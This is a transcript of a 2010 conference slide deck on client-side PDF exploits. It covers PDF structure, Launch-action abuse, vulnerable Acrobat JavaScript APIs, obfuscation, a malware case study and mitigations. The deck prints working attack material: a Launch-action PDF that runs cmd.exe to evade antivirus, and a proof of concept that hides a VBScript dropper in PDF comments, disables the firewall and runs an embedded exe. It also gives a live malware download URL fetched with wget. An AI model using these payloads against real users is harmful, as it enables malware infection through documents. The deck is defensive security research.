Client Side Exploits using PDF
-
Upload
nu-the-open-security-community -
Category
Technology
-
view
5.156 -
download
5
description
Transcript of Client Side Exploits using PDF
![Page 1: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/1.jpg)
BY,
ANKUR BHARGAVA(INFOSYS TECHNOLOGIES LIMITED)
TAMAGHNA BASU(SECURITY RESEARCHER)
Client Side Exploits using PDF
C0C0N Security & Hacking Conference
![Page 2: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/2.jpg)
Contents
About PDF
Launch Action
Exploits
AcroJs Exploits
Road Ahead
Tools and
References
![Page 3: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/3.jpg)
About PDF
• What is PDF?• Incidents in the wild• Why pdf attcks?• PDF document structure
![Page 4: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/4.jpg)
Potentially Dangerous File / Penetration Document Format
Stands for Adobe Portable Document Format
Exchange and manipulation of electronic data reliable and platform independent
Has become most widespread and used document description format throughout the world
![Page 5: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/5.jpg)
Adobe PDF – As a programming language
PDF document is more than a powerful document format
Has a complete programming language of its own
Dedicated to document creation and manipulation
Relatively strong execution features
![Page 6: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/6.jpg)
Adobe PDF – Security Issues
![Page 7: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/7.jpg)
2010: Still Continuing…
![Page 8: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/8.jpg)
2010: Still Continuing…M
arch
April
May
June
![Page 9: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/9.jpg)
Incidents in the wild
Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from [email protected]
Jun 20 CVE-2010-1297 PDF Meeting agenda from [email protected]
Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations
Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic Relations - with Poison Ivy
Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation
Jul 6 CVE-2010-1297 PDF EPA's Water Sampling Report from spoofed [email protected]
Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines
![Page 10: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/10.jpg)
The Reign of Zeus:
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.
In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like: Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek
ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the one malware most utilized by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal of information stealing .
![Page 11: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/11.jpg)
The Reign of Zeus
A recent breakthrough in spreading Zeus via PDF files threatens to further the spread of Zeus. The pdf file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010-0188 vulnerability - buffer overflow – manifests itself when the field containing the image is accessed.
CVE-2010-0188 exploits statistics 2010
![Page 12: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/12.jpg)
Popular in malwaredomainlist.com
![Page 13: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/13.jpg)
Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
VUPEN ID - VUPEN/ADV-2010-1992Release date - 2010-08-03 It is caused by a memory corruption
error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari
![Page 14: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/14.jpg)
Why PDF
Popularity and usability
Flexibility, platform independent, rich text
Trust level is high on pdf – static piece of information
Rich api, easy to exploit / misuse
Dominance of Adobe reader, huge scope for attack
![Page 15: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/15.jpg)
PDF document structure
The general structure of a PDF file is composed of the following code components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.
![Page 16: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/16.jpg)
PDF Document Structure
PDF Header
Objects
Trailer
Bod
y
Cross reference Table
![Page 17: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/17.jpg)
Launch Action
• Launch Action Api• Some Examples• Evading Antivirus• With embedded EXE
![Page 18: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/18.jpg)
Launch Action Vulnerability
A launch action launches an application or opens or prints a document. Following are the action dictionary entries specific to this type of action.
ENTRIES
S :Name Required) The type of action that this dictionary describes; shall be Launch for a launch action.
F: File specification(Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
Win : dictionary(Optional) A dictionary containing Windows-specific launch parameters.
![Page 19: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/19.jpg)
Launch Action Vulnerability
PARAMETERS
F : byte string (Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (\), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
P : byte string(Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
![Page 20: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/20.jpg)
Launch Action Vulnerability
Open command prompt Open website
![Page 21: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/21.jpg)
Launch Action Vulnerability
Open notepad.exe
![Page 22: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/22.jpg)
Launch Action Vulnerability
![Page 23: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/23.jpg)
Launch Action Vulnerability
Changing the message
![Page 24: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/24.jpg)
Launch Action Vulnerability
Confidential Data!! If You are Authorized Click on 'Open'. Check 'Do Not Show This Message Again' to avoid this dialog next
time
![Page 25: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/25.jpg)
Launch Action Vulnerability
![Page 26: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/26.jpg)
Launch Action in 9.3.3
![Page 27: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/27.jpg)
Launch Action Vulnerability
![Page 28: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/28.jpg)
Evading Antivirus by Changing the format
You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator.
These two examples are equivalent to Acrobat
2 0 obj (Hello World)Endobj
3 0 obj<< /Example 2 0 R >>Endobj
3 0 obj<< /Example (Hello World)>>endobj
![Page 29: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/29.jpg)
Evading Antivirus
What You Can Leave Out All Page data All Whitespace, except for End-Of-Line after comments The version number part of %PDF-1.1 The %%EOF The xref table And thus also startxref Most Object /Types
So what's actually required? %PDF-anything, but if the file is too confusing for Acrobat, you need
at least the first number. Like %PDF-1. A trailer with a /Root dictionary for the Catalog A /Pages dictionary, but this can be empty, just as long as it's a
dictionary type. An /OpenAction if you want to launch your Javascript upon file
open. The Javascript Action.
![Page 30: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/30.jpg)
Evading Antivirus
%PDF-1.trailer<</Root<</
Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)/P<0A0A0A0A0A0A0A0A4E6F74653A2054686973206973206120736563757265205044462E20546F207669657720746865207365637572656420636F6E74656E7420706C6561736520636C69636B2074686520224F70656E2220627574746F6E2062656C6F772E>>>>>>>>>
![Page 31: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/31.jpg)
Evading Antivirus
![Page 32: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/32.jpg)
POC: Launching an Embedded exe
Step 1 : Embed the hex content of the exe in a vbscript which extracts it out to the file system and runs it.
Step 2 : Embed that vbscript in the pdf file as comments.
Step 3 : Launch cmd.exe and create another script which extracts out the main vbscript from the pdf and run them both.
![Page 33: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/33.jpg)
Step 1 : Embed the hex content of the exe in a vbscript
Dim b,blFunction c(d)c=chr(d)End Functionb=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)....,"")bl = 3072Set fso = CreateObject("Scripting.FileSystemObject")Set f = fso.OpenTextFile(“helpme.exe", 2, True)For i = 0 To blf.write(b(i))Nextf.close()Set WshShell =
WScript.CreateObject("WScript.Shell")WshShell.Run "netsh firewall set opmode disable", 0,
TrueWshShell.Run "helpme.exe", 0, FalseWshShell.Run "taskkill /IM cmd.exe /F", 0, False
Hex content of the exe as a character array
![Page 34: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/34.jpg)
Step 2 : Embed the vbscript in the pdf file as comments
%'SS%Dim b,bl;Set WshShell = Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close(); Set WshShell = WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False%'EE
6 0 obj[/PDF /Text]endobj
![Page 35: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/35.jpg)
Step 3 : Launch cmd.exe and create another script
/c echo Set fso=CreateObject("Scripting.FileSystemObject") > execute.vbs && echo Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >> execute.vbs && echo pf=f.ReadAll >> execute.vbs && echo s=InStr(pf,"'SS") >> execute.vbs && echo e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e-s) >> execute.vbs && echo Set z=fso.OpenTextFile("toexecute.vbs", 2, True) >> execute.vbs && echo s = Replace(s,"%","") >> execute.vbs && echo s = Replace(s,";",vbcrlf) >> execute.vbs && echo z.Write(s) >> execute.vbs && execute.vbs && toexecute.vbs
![Page 36: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/36.jpg)
Generated VBScript
Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1,
True) pf=f.ReadAll s=InStr(pf,"'SS") e=InStr(pf,"'EE") s=Mid(pf,s,e-s) Set z=fso.OpenTextFile("toexecute.vbs", 2, True) s = Replace(s,"%","") s = Replace(s,";",vbcrlf) z.Write(s)
![Page 37: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/37.jpg)
AcroJS
• AcroJs Api• Vulnerable Api’s • Obfuscation Techniques• Case Study
![Page 38: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/38.jpg)
AcroJS
• Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers.
• This functionality includes the following features, – Processing forms within the document– Batch processing collections of PDF documents– Developing and maintaining online collaboration schemes– Communicating with local databases – Controlling multimedia events
![Page 39: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/39.jpg)
JavaScript Actions
• A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
• Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual ap pearances.
PARAMETERS /S Type - name(Required) The type of action that this dictionary describes; must
be JavaScript for a JavaScript action.
/JS Type - text string or text stream(Required) A text string or text stream containing the JavaScript
script to be exe cuted.
![Page 40: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/40.jpg)
launchURLAlertbox
Acrojs examples
![Page 41: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/41.jpg)
Acrojs examples
![Page 42: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/42.jpg)
Acrojs examples
![Page 43: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/43.jpg)
Vulnerable APIs
• getIcons() [CVE-2009-0927]– Stack-based buffer overflow in Adobe Reader and Adobe Acrobat
9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
• Util.printf() [CVE-2008-2992][CVE-2008-1104]– Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2
and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
– Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
![Page 44: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/44.jpg)
Vulnerable APIs
• getAnnots() [CVE-2009-1492]– The getAnnots Doc method in the JavaScript API in Adobe
Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
• customDictionaryOpen() [CVE-2009-1493]– The customDictionaryOpen spell method in the JavaScript
API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
![Page 45: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/45.jpg)
Vulnerable APIs
• Doc.media.newPlayer [CVE-2009-4324]– Use-after-free vulnerability in the Doc.media.newPlayer
method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
• Collab.collectEmailInfo [CVE-2007-5659]– Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1
and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
![Page 46: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/46.jpg)
Obfuscation Techniques
Why? To make analysis more difficult To avoid detection by virus scanners
Ways? Using javascript Obfuscation Using Pdf Obfuscations(Filters)
![Page 47: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/47.jpg)
Javascript Obfuscations : Unlearn Coding Ethics
![Page 48: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/48.jpg)
Distorting format
Normal Code Obfuscated Code
function execute(data, time){ Timelag=5000; if (time > Timelag) { // some code }}
function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; }}
function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}}function overflow(hex, loop) {for i=0;i<loop;i++){hex = hex + hex;}}
![Page 49: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/49.jpg)
Obfuscating IdentifiersNormal Code Obfuscated Code
function execute(data, time){ Timelag=5000; if (time > Timelag) { // some code }}
function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; }}
function aeiou(lIlIIlI, O0OOOO0OO000OO){WWMWMMWMWMWMW=5000;if (O0OOOO0OO000OO > WWMWMWMWMWMW){// some code}}
function aimpq(xxwmnnx, pqrtxw){for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++){xxwmnnx = xxwmnnx + xxwmnnx;;}}
![Page 50: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/50.jpg)
Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters
function _____(____,__________){
______________=5000;if (__________>______________){
// some code}
}function ___(_______, ______){
for(________________=0; ________________<______; ________________ ++)
{_______ = _______ + _______;
}}
![Page 51: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/51.jpg)
Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters
function _____(____,__________){______________=5000;if (__________>______________){// some code}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
![Page 52: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/52.jpg)
Chain of Eval
Normal Code Obfuscated code
app.alert(“c0c0n”) func="eval";one='app.alert("c0c0n")';two=eval(one);three=eval(two);eval(func(three));
![Page 53: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/53.jpg)
Splitting Javascript
Normal code Obfuscated Code
app.alert(“hello world”); Rt=“);”;Td=“ert(\”hel”;Ab=“ap”;Qw=“ld\””;Kg=“p.al”;Gh=“lo wor”;Eval(“hh=Ab+Kg+Td+Gh+Qw+Rt”);Eval(hh);
![Page 54: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/54.jpg)
Callee Trick
Function accesses its own source and uses it as a key to decrypt code or data
function decrypt(cypher){var key = arguments.callee.toString();for (var i = 0; i < cypher.length; i++){plain = key.charCodeAt(i) ^ cypher.charCodeAt(i);}...}
![Page 55: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/55.jpg)
Pdf obfuscations
Using Filters for streams.Most common encoding techniques -
ASCIIHEXDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode
![Page 56: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/56.jpg)
Case Study
Malware found from - www.malwaredomainlist.com
File link www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
Added on – 29th july 2010
![Page 57: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/57.jpg)
Virus total Reports 5/42(11.90%)
![Page 58: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/58.jpg)
Analysis
![Page 59: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/59.jpg)
STEP-1
WGET www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
![Page 60: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/60.jpg)
STEP-2
Behavioral AnalysisEnvironment• By using vm image• Filemon,Processmon,Regmon,TCPViewResults• Under Process ‘AcroRD32.exe’ Was trying to
connect to remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
![Page 61: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/61.jpg)
STEP-3
Pdfid.py
![Page 62: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/62.jpg)
STEP-4
Static/Code Analysis
![Page 63: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/63.jpg)
Word Editor
![Page 64: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/64.jpg)
Decoded the script
![Page 65: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/65.jpg)
Formatted using jsbeautifier.org
![Page 66: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/66.jpg)
Replacing with meaningful identifiers and removing unnecessary comments
![Page 67: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/67.jpg)
Replacing ‘X’ from parameter
![Page 68: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/68.jpg)
![Page 69: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/69.jpg)
Shellcode Analysis
Connecting to…http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
![Page 70: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/70.jpg)
Road Ahead
• Mitigations• Adobe’s security Measures• Future Exploit methods
![Page 71: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/71.jpg)
How can we protect ourselves
• Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default.
• Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background.
• Always install the latest patch/update, even for older Adobe product versions.
• Disable Javascript• Uncheck ‘Allow non-PDF gile attachments with external
applications’ to prevent launch action vulnerability.
• PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on, however alternative programs are just as vulnerable to malware as they gain popularity.
![Page 72: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/72.jpg)
Road Ahead
Focus Less on javascript exploitsAttackers focusing more on embedded
objects inside pdf i.e flash Adobe to introduce sandboxing to limit
Reader exploits
![Page 73: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/73.jpg)
Tools And References
![Page 74: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/74.jpg)
Tools used
MalzillaMozilla addon
javascript deobfescator by Wladimir Palant
Vmware PlayerSysinternal tools
Processmon,filemon,regmon,tcpview
WinHexHexEdit
![Page 75: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/75.jpg)
References
www.malwaredomainlist.com www.adobe.com/ www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on www.blog.didierstevens.com www.jsbeautifier.org http://research.globalthoughtz.com http://www.zdnet.com/ http://www.scansafe.com/ http://www.computerworld.com/s/article/9176117/ http://www.darkreading.com/ http://www.virustotal.com/ http://recon.cx/ http://www.blog.zynamics.com
![Page 76: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/76.jpg)
References continued..
http://www.marketwire.com/ http://www.symantec.com/ http://www.securelist.com/en/analysis http://contagiodump.blogspot.com/ http://www.f-secure.com/ http://www.securelist.com/ http://www.secureworks.com/ http://en.wikipedia.org/ http://www.malwaredomainlist.com/ http://blogs.adobe.com/ http://blog.fireeye.com/ http://intrepidusgroup.com/ http://www.vupen.com
![Page 77: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/77.jpg)
Thank you
Tamaghna [email protected]\titanlambdatamahawk-techguru.blogspot.com
Ankur [email protected]